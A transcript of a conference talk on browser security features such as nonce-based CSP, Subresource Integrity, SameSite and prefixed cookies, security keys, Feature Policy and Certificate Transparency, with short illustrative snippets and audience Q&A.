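Only script elements carrying the matching nonce attribute execute, and with 'strict-dynamic', scripts that those trusted scripts create programmatically are trusted in turn, while host whitelists are ignored by CSP3-aware browsers.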

You trust the script, and you allow that script to load the various resources it needs. So if you're at all interested in deploying Content Security Policy, a strict nonce-based CSP using 'strict-dynamic' is what teams inside of Google are actively deploying on Google products, and it's probably going to be significantly easier for you than the long list of origins you saw on something like GitHub a moment ago. I'd also note that there's something called Subresource Integrity. As you noticed a moment ago, Content Security Policy is generally origin-based; that is, we say: I trust this origin, origin, please give me script. It is the case, however, that CDNs get hacked; the jQuery CDN was hacked a number of

times. Partly in response, folks developed Subresource Integrity, which I think is interesting. The idea is that it gives you a content-based mechanism of saying: I want to load a script from this origin, but I also want the script to be exactly the script that I think it is. So I upload the script to my CDN, I take a hash of that script, SHA-256 or SHA-384 or whatever, and I reflect that hash in an integrity attribute on the script element in the page. This allows the browser to say: okay, I'm going to download it, and then I'll verify that this content actually matches the

content you described in the integrity attribute. If you do this, then you get a content-based check verifying not only that you're executing script from the right origin, but that it's actually the script you want. In CSP3, we're going to layer hashes on top of Subresource Integrity as a group: Content Security Policy will verify the hashes that you list for a specific script, and then Subresource Integrity will verify that those hashes match the actual content. This gives you a content-based mechanism for allowing a specific script to execute on your page, which I think is going to be really powerful, especially for the kind of loader mechanism we were just talking about, where you say: I trust this specific script.
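The integrity value is just a hash of the file, base64-encoded and labeled with the algorithm. A small sketch, in Python for illustration, of computing one:

```python
import base64
import hashlib

def sri_integrity(body: bytes, alg: str = "sha384") -> str:
    """Compute a Subresource Integrity value like 'sha384-...' for a script body."""
    digest = hashlib.new(alg, body).digest()
    return alg + "-" + base64.b64encode(digest).decode("ascii")

# The result goes into the script element's integrity attribute, e.g.:
#   <script src="https://cdn.example.com/app.js" integrity="sha384-..."></script>
print(sri_integrity(b"console.log('hello');"))
```

If the bytes the CDN actually serves hash to anything else, the browser refuses to execute them.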

Really, I only trust this script, not just any script from that origin. Next: we've made a number of changes to cookies over time. Cookies are one of the large mistakes we made in designing the web; it's really unfortunate that cookies have a completely different security model than everything else. Generally speaking, we have an origin-based security model, where we say this origin is responsible for itself and not for anything else, and it shouldn't just gain access to anything else; it should have to request things from other origins. Cookies, however, broaden origins out to an effective TLD plus one. So you have com, which is the TLD, and then you buy

something.com, so something.com is the eTLD+1. There are also things like appspot.com, where appspot.com is itself effectively a TLD, so we treat it differently than we treat something like example.com. Cookies have power up to the effective top-level domain, so even if I'm on something.something.example.com, I can set cookies for example.com; everything under the eTLD+1 is lumped into the same pile. There are a couple of things we'd like to do to change cookies, to make them slightly less terrible, at least in terms of their security properties, and a couple of those things are here.

SameSite cookies are the thing I'm most excited about. They shipped, I think, in Chrome 51; Firefox is working on an implementation, and other folks are interested. The idea is that instead of allowing the user agent to make authenticated requests on your behalf anywhere that a website wants, which enables things like cross-site request forgery attacks, you can specify that a specific cookie is same-site. That is: I want to send myself this cookie, but if anyone else initiates the request, the cookie shouldn't be sent. You can imagine a session cookie, for instance, that is set to be same-site: if example.com sets the cookie, and example.com makes a request to

example.com, great; but if evil.com makes a request to example.com, then you shouldn't send that cookie along, because sending that cookie can trick the server into granting the request, saying: oh, this is totally the user, I think we should, you know, transfer all their money to evil.com. So SameSite cookies give you the ability to lock a cookie to a specific site's context: I can make requests to myself, so whenever I call my own APIs they'll totally work, but if anyone else calls my APIs, you're

not going to deliver that cookie, and because you don't deliver it, it's relatively straightforward for the server to understand that this is not an authenticated request and that it shouldn't actually be executed. I'll also note that there's a Lax value for the SameSite attribute, so there are two modes you can run SameSite cookies in. Lax mode has the property I just talked about, where subresource requests from evil.com to example.com won't contain cookies, but if you navigate to example.com, we will send the cookies along. That is, a top-level navigation will be treated as same-site, even though the navigation was initiated

by evil.com. Strict mode won't treat that as a same-site navigation; it will say: no, evil.com initiated the request, and we're not going to send the cookie, even though you're doing a top-level navigation. This gives you the ability to set up a two-cookie system. If you're familiar with Amazon, for instance: if you go to Amazon, it knows who you are, and it says, hello Mike, would you like to buy all the things today, and you say, yes please, give me all the things. But when you actually want to buy things, you really do have to type in your password, and then you go through the checkout flow. So

there are two levels of access to the website: there's "yep, I know who you are and can show you a reasonable rendering to give you the information you're looking for", and then there's "you're about to take a dangerous action, so I'm going to examine your request more carefully". By having these two kinds of cookies, a Strict and a Lax same-site cookie, you can build the same sort of mechanism yourself and have the browser guarantee that these cookies are only sent in a particular set of contexts. I think this is going to be pretty powerful. As I said, it's only in Chrome right now.
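The two-tier scheme sketched above might look like this in Set-Cookie headers (the cookie names and values are illustrative):

```http
Set-Cookie: reader=abc123; Secure; HttpOnly; SameSite=Lax
Set-Cookie: writer=def456; Secure; HttpOnly; SameSite=Strict
```

The Lax cookie still arrives on top-level navigations from other sites, so the page can greet a signed-in user; the Strict cookie only arrives on same-site requests, so state-changing actions can require it.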

I'm hopeful that Firefox will be shipping it relatively soon as well. Dropbox just put out a really good article about SameSite cookies and the way they've deployed them on their sites for CSRF protection; I think it's absolutely worth your time to skim through it. This has the potential to mitigate an entire class of CSRF attacks; no, it won't kill all of them, but it has really good potential, and I'm pretty excited about it. The next change we've made is adding prefixes to cookie names. One issue with cookies today is that you have no idea what the properties of a cookie actually are; all that's sent to the server

is the name and the value. You might have a Secure cookie, you might have an HttpOnly cookie, it might be same-site, it might not be; when it's actually delivered to the server, you don't know what the properties are. And it's really difficult to change that, because of the way cookies are used; changing that wire behavior would be incredibly difficult. So what we're doing instead is smuggling some information into the name of the cookie, and then making guarantees in the browser that cookies with certain names must have certain properties. There are two prefixes deployed today: one is __Host-, and the other is

__Secure-. __Secure- is straightforward: you can only use the prefix if your cookie has the Secure attribute, that is, if it's only delivered over HTTPS. __Host- is a little bit more interesting: we're making the cookie's security model as close to the origin security model as we possibly can. We say this is a host cookie; that is, it has no Domain attribute, it is Secure, and it has a Path of /. This basically maps a cookie to an origin, more or less; it still ignores ports, but it does a pretty good job for HTTPS websites.
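In header form, the rules look like this (name and value illustrative):

```http
Set-Cookie: __Secure-sid=abc123; Secure; Path=/
Set-Cookie: __Host-sid=abc123; Secure; Path=/
```

A conforming browser simply rejects a __Secure- cookie that lacks the Secure attribute or arrives over HTTP, and rejects a __Host- cookie unless it is Secure, has Path=/, and carries no Domain attribute.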

I think this is actually being used on something like 0.08% of the Set-Cookie headers we see today, and folks like Dropbox and folks like GitHub are using it as CSRF protection, because it gives you some good guarantees about the provenance of a particular cookie and its properties. This is kind of new; it's deployed in Firefox, it's deployed in Chrome, and folks are starting to use it, so I think it's going to be pretty interesting going forward. The last change we've made to cookies involves the Secure attribute I mentioned earlier. Secure has been around for a really long time, but it hasn't actually given you much guarantee of security, because secure cookies could

be set, deleted, and modified by non-secure origins. This led to some vulnerabilities on google.com, and it's led to vulnerabilities on other websites, where a non-secure subdomain, for instance, is able to set cookies on your domain: you can run session fixation attacks, you can remove Secure cookies, and we wanted to lock that down. So we've made some changes to what Secure means: Secure should mean that a cookie is only sent to a secure origin and can't be modified by a non-secure origin. This also means we've changed the eviction policy for cookies, so that non-secure cookies are evicted before secure cookies; if you're a non-secure origin, you shouldn't

be able to force secure cookies to be evicted from the jar. We rolled this change out in Chrome 56 or 57; Firefox just rolled it out in Firefox 52, and it looks like it's going to stick. It's a little bit iffy to make changes like this, because of the number of websites that use cookies in weird ways; we've seen some issues with it, but hopefully they're issues we can fix without breaking the thing that cookies usually do, which is authentication. On that note, it is incredibly important that we stop phishing, because phishing is one of the huge user-facing problems: even if we solved all the technical stuff, phishing would still trick people into giving up their passwords,

and that's going to be problematic in terms of authentication. We saw that with Podesta in the States; it's just going to be a perennial problem. It would be great if people would use password managers, because password managers make it possible for you not to reuse passwords across every website: if you get phished on google.com, you don't automatically give up your dropbox.com password as well. One way we can help is by allowing websites to integrate more fully with the password manager. The Credential Management API tries to do this: the website can get credentials from the password manager, can ask for them directly, and if the user has set themselves up in such a way

that they want to automatically log into a website, they'll never see a password form again. I think this would be a much better world than the one we have today. If the password manager knows your account, and you've configured your browser to automatically sign you in, then when you go to the website it will ask for a credential, the browser will give it to the website, and you'll automatically be signed in without actually having to interact with a sign-in form at all. The goal is that, over time, it should become unusual for a user to type in a password themselves; we should be able to slowly iterate toward a world where passwords are not something that users see.
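A hedged sketch of what that flow looks like with the Credential Management API as it existed around this time (the exact option names and the handling of the retrieved credential shifted between drafts, so treat this as illustrative):

```javascript
// Illustrative sketch; assumes a browser exposing navigator.credentials
// (shipped in Chrome around version 51; option names varied between drafts).
async function autoSignIn() {
  if (!navigator.credentials) return;  // feature-detect
  const cred = await navigator.credentials.get({
    password: true,       // ask the password manager for a stored password credential
    mediation: "silent",  // only succeed if the user opted into automatic sign-in
  });
  if (cred) {
    // Hand the result to your own sign-in endpoint; "/login" is a
    // hypothetical path, nothing about it is standardized by the API.
    await fetch("/login", {
      method: "POST",
      credentials: "include",
      body: new URLSearchParams({ id: cred.id }),
    });
  }
}
```

The important property is that the credential comes from the browser's password manager rather than from a form the user typed into, so there is nothing for a phishing page to capture.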

Instead, passwords would be mediated by the user agent. Building on top of that, it would be great if we could get rid of passwords altogether, because passwords are terrible, right? It would be really nice if we could start using things like security keys. How many of you have a security key? Okay, excellent. Everyone should be raising their hands, because it's incredibly important: if you use a Google account, a Dropbox account, a Twitter or GitHub account, anything along those lines, Facebook too, they all support second-factor authentication, and a security key gives you really good security properties in terms of anti-phishing. That is, it is impossible for

evil.com to respond to a challenge in the same way as good.com. The token basically generates a public/private key pair; it sends the public key up to the server, and the next time the server asks for something, you verify that you have the same key you had before. You verify key possession every time, and by setting that up you get really good guarantees that you're actually talking to the user you expect to be talking to. Something you know, something you have. [Audience question about SQRL] Like SQRL? Um, I think the idea there is that it's a hardware device... sorry, what does SQRL stand for? I

don't know it, okay, sorry. It's an authentication mechanism? Okay, then I may be wrong; it sounds really interesting, we should talk. I think the reason I'm betting on security keys is that there are deployments today, and we're building an API for the browser. My hope is that we'll build it on top of the Credential Management API we just talked about, so that developers will have a one-stop shop for authentication: they can get passwords, they can get second factors, and if you come up with an amazing new authentication mechanism in the future, there will be a single point where developers can go to get authentication features. Feature Policy is

something that allows websites to turn things off. Feature Policy is like a gate in front of the various APIs that you have on a website: if you know that you're not going to use geolocation, why allow yourself to have access to the user's location at all? It works in a similar way to the sandboxing mechanisms you see on various operating systems, where you say: this process is going to do some stuff, but it's not going to talk to the network, so don't even let it talk to the network, and if it tries, kill it. Feature Policy lets people remove APIs from websites and say: okay, I'm not going to use geolocation.
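As proposed at the time, the opt-out is a response header; the syntax below follows the early Feature Policy draft (the mechanism was later reworked into Permissions-Policy, with a different syntax):

```http
Feature-Policy: geolocation 'none'; camera 'none'; microphone 'none'
```

With this header set, calls to those APIs fail on the page and in its frames, regardless of what any injected script attempts.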

So there's no need to even offer it to me. This has really interesting performance aspects, because if you know you're not going to use document.write, then the renderer can take a different, fast path on your website: oh, you're not going to call document.write, so I can make this amazingly fast. So there are really interesting performance benefits, but there are also really interesting security benefits, because you can turn off surface area and remove it entirely from an attacker's repertoire. The final thing I'll talk about is Origin Policy. We've talked about a lot of policies, and it would be really nice if you didn't have to deliver each of them individually on

every response, right? Because they're all HTTP headers. Origin Policy tries to unify these into a single manifest file on your origin that sets up the security properties, and other properties as well, for your whole origin. For instance, I talked about CORS earlier, and I suggested that there are these CORS preflights that basically verify whether you actually speak CORS and understand what's going on. It would be nice if you could simply assert that you understand what's going on, so we could remove all of these transitory, not particularly valuable requests. Origin Policy might be a way of doing that, where we assert in a secure way: I understand CORS, please stop sending me these preflights, just send me the CORS request and I'll totally verify it myself.

It would also allow you to pin things like Content Security Policy: instead of delivering a 4 KB policy with every response, you deliver it once in the manifest, have that manifest cached in the browser, and use it for every response from that origin. So this has some really interesting properties, and I think we'll probably be able to merge it in some way with the web app manifest that browsers use today for things like installation to the home screen. I said "last", and that was entirely wrong: there's also a thing called suborigins. There's this notion of an origin that we talked about earlier,

and the origin is the core of the security policy of the web. It would be really nice, however, especially for large origins, to be able to contain individual applications. google.com is a good example of this: you have Docs, you have Mail, you have Maps, and all of these are separate applications, coded by separate teams, that shouldn't have access to each other's data. Yes, they're all on google.com, and therefore they share a lot of resources, share a lot of responsibility, but they also share a lot of authority. We'd really like to somehow shard this origin into a variety of suborigins, and basically reduce the privileges that we're granting

to each page: a page could hint to the server, no, I'm the Docs suborigin, I'm totally not actually google.com, please treat me differently. This has some pretty interesting properties. We're still working out what exactly it would mean to be a suborigin; we have an implementation of the current draft in Chrome, so it would be great if you could play around with it and give us some feedback as to whether or not we're going in the right direction. But this is a really interesting area to explore, because it gives you the ability to reduce the privilege of a particular page, protecting the other applications on your origin from potential badness. If you look at google.com, we have

things like Zeitgeist from 2007. It was not written in a secure way, it was written by third parties, and we haven't looked at it in a long time. It would be great if we could shard that off in some way without making substantial changes to it. Isolated origins are similar to suborigins, but the properties you'd want are a bit different: you want to actually lock your site down so that it can't talk to other sites and other sites can't talk to it. There are these things called Chrome Apps; in Chrome OS, for instance, you'll have an application that shows an HTML page. We're killing Chrome Apps for a variety of reasons, mostly because we want to push those applications

back to the web, but we want to replace them with something that is webby yet gives you the same isolation properties: you have your own cookie jar, you're not making requests into the authenticated web, things along those lines. This is very exploratory, so ideas here would be welcome, but we're trying to figure out what it would mean for an origin to really isolate itself from the rest of the web. With that, one more thing before I stop. Every time I come to a conference and look up at the stage, everyone looks like me: we are all white, we are all losing our hair, many of us have beards, we're older than we used to be, and

it's kind of sad. I'd really like to see more diversity, both at conferences like this one, and also in our work and our lives. I think it's unfortunate that the culture we've built, for whatever reasons, has made it harder and harder for people who don't look like me to be successful. I don't have an answer for that, but it's something I'm thinking about a lot, and I'd invite you to think about it as well. And with that, we'll open the stage for a few questions, if there are any volunteers. [Question] Maybe one general question: you were talking about adding features, but we saw HTTP/2

now that we have HTTP/2 and new stuff is being developed, is there anything like an HTTP 3.0 or something that you're specifically focusing on, with all the features being added, to make them worth it on the web? Yeah, so first let me say that HTTP/2 is great and you should use it, and what's also great is that no browser has implemented it over plain HTTP, only over TLS, which is wonderful. There are new protocols coming out as well; QUIC is one of them, where the team is experimenting with UDP, because TCP

connection setup has costs that UDP lets them avoid, and they're getting some really good properties, especially for things like video. So yes, we're working on new networking stuff, but I think your question is actually whether we can set a new baseline. A good example of this is quirks mode versus standards mode for HTML, where you have old HTML pages that rely on weird behaviors we decided we didn't want anymore. Browser vendors got together and said: we'll look at the doctype of the document; if it's an old doctype, we'll use the crazy old rendering mode, and if it's the new doctype, we'll use the nice new standards-mode rendering.
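Concretely, the doctype switch looks like this:

```html
<!-- No doctype at all: browsers fall back to the legacy quirks-mode rendering -->
<html><body>...</body></html>

<!-- The modern doctype opts the page into standards mode -->
<!DOCTYPE html>
<html><body>...</body></html>
```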

That approach is really expensive, both in terms of maintenance, because now we have to maintain two code paths, and in terms of helping developers understand what's going on, because we're locking ourselves into backwards compatibility. It would be nice if we could figure out how not to be backwards compatible with APIs we don't like, because generally speaking, if there are APIs that nobody likes, then attackers will use them, and we need to figure out ways of actually turning them off, either by killing them entirely in the web platform or by giving developers the ability to turn them off themselves. One thing we've been thinking about is the notion of a security mode, where you send the

header that says "please make me secure, version 1," and maybe over time that turns into "please make me secure, version 2" or "version 3," and we apply a different set of settings to a page based on the mode it has opted into. I think that's a totally reasonable thing to explore, but it's not really clear to me what we can do in that kind of simple-toggle sort of way that would really improve the security of a website. Some things are relatively straightforward, like turning off document.write; that would be really nice. Other things are more difficult: setting up a Content Security Policy, for example, generally requires a lot of server-side changes.
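For example, even a fairly small policy like the one below (the hostnames are placeholders) assumes you know where every script on the page comes from and that you've moved inline scripts into files, which is exactly the kind of server-side, application-specific work involved:

```http
Content-Security-Policy: script-src 'self' https://cdn.example.com; object-src 'none'; base-uri 'none'
```

A page that still relies on inline `<script>` blocks or loads scripts from hosts not listed here would simply break under this policy until the application itself is changed.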

It also requires you to really understand the application. So I would love for there to be a new mode for the web that just turns a lot of things off; finding the contours of that is difficult, but I think it's a worthwhile effort. The next question was about deprecation: aren't you already pushing in that direction by marking pages as insecure, so that websites just have to get better? Yeah, so there are two things here. First, and really importantly, in a lot of those cases we end up using users as a cudgel against the website, and hitting a website with

its own users makes the website change, but it also kind of makes the users sad, because they're getting hit in the process. SHA-1 deprecation is a good example of this: when large websites still use SHA-1 certificates, we can't turn SHA-1 off without making users sad. There's a really interesting balance we need to find between making users sad and making websites change, and I don't think we've found it yet; I think we're still figuring out how far we can go. All of these kinds of changes improve security, but at the expense of user happiness, and the end goal is for users to be happy on the web and to be doing good things, and we

want them to be secure while they're doing it. But we can't treat security as an absolute: it would be great if we just turned off a lot of APIs, but doing so would break lots of websites, and finding that balance is difficult and something we're still working on. One last short question, and afterwards you're welcome to continue the discussion. I'm wondering about a couple of the things you talked about, with the focus on deterministic behavior rather than having differences on

first contact. Google in particular has been a target here: there were bad certificates issued for Google properties that people were actually seeing in the wild. Are there any efforts underway to detect bad certificates, given the depth of that threat? Yeah, so Certificate Transparency is the big bet that we're making to try to figure out what's going on there. It's basically a mechanism for forcing certificates to be public: we use the magic blockchain and then everything is fixed, right? So you have a verifiable log of certificates, and you can

verifiably prove that a certificate was logged at some point. We're starting to force CAs to use Certificate Transparency and actually submit all the certificates they mint to a set of these log servers, which allows us to verify that a cert is actually valid. For Symantec, I think we're already requiring an SCT in the cert, and for other CAs I expect we'll be making similar requirements; the goal is to get to CT everywhere. You should be able to verify your certs, and I think we're making progress there pretty quickly. So CT is, I hope, the answer. [Applause]
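The "magic blockchain" line is a joke: a CT log is an append-only Merkle hash tree, not a blockchain. As a rough illustration of how a log commits to a set of certificates, here is a minimal sketch of the RFC 6962 Merkle Tree Hash; the leaf bytes are made up for the example, whereas real logs hash encoded certificate entries:

```python
import hashlib


def mth(leaves: list) -> bytes:
    """RFC 6962-style Merkle Tree Hash over a list of leaf byte strings."""
    if len(leaves) == 0:
        return hashlib.sha256(b"").digest()
    if len(leaves) == 1:
        # Leaf hash: the 0x00 prefix domain-separates leaves from interior nodes.
        return hashlib.sha256(b"\x00" + leaves[0]).digest()
    # k is the largest power of two strictly less than the number of leaves.
    k = 1
    while k * 2 < len(leaves):
        k *= 2
    # Interior node hash: 0x01 prefix, then left subtree hash, then right.
    return hashlib.sha256(b"\x01" + mth(leaves[:k]) + mth(leaves[k:])).digest()


# Placeholder "certificates" standing in for real log entries.
certs = [b"cert-for-example.com", b"cert-for-example.org", b"cert-for-example.net"]
root = mth(certs).hex()
print(root)
```

Because the root hash changes if any logged certificate is altered or removed, anyone holding the root can later verify that a particular certificate was in the log, which is the property CT builds its inclusion proofs on.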